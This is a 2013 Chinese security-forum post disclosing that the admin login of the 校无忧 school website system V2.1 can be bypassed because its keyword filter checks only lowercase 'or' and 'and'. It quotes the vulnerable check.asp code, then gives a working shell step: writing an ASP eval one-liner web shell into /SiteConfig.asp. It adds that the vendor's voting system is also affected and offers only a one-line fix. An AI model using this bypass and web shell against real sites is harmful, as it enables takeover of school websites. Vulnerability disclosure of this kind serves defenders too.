我们来自五湖四海,不为别的,只因有共同的爱好,为中国互联网发展出一分力!

校无忧学校网站系统 V 2.1后台登陆验证可大小写绕过

2013年11月30日17:15 阅读: 29346 次

标签: 网站, 无忧, 学校

以 校无忧学校网站系统 V 2.1 为例到 admin/check.asp 文件看了下。。
 
if request("action")="login" then
   Username=trim(request("admin_name"))
   Password=trim(request("admin_pass"))
end if
If Instr(Username,"or")<>0 or Instr(Password,"or")<>0 or Instr(Username,"and")<>0 or Instr(Password,"and")<>0Then
   response.write "<br><br><br><br><font size=2><center>没事别搞人家后台,谢谢!<br>否则一切后果自负!<br>校无忧-Www.Xiao5u.Com</font>"
else

 

这尼玛在逗我。。?
 
大小写绕过,
 
拿shell:
/SiteConfig.asp 处
"%><%eval(request("r"))%>
写入一句话。
他的 评选投票系统也是如此

修复:严格过滤
分享到: 更多
©2017 安全焦点 版权所有.
人才招聘联系我们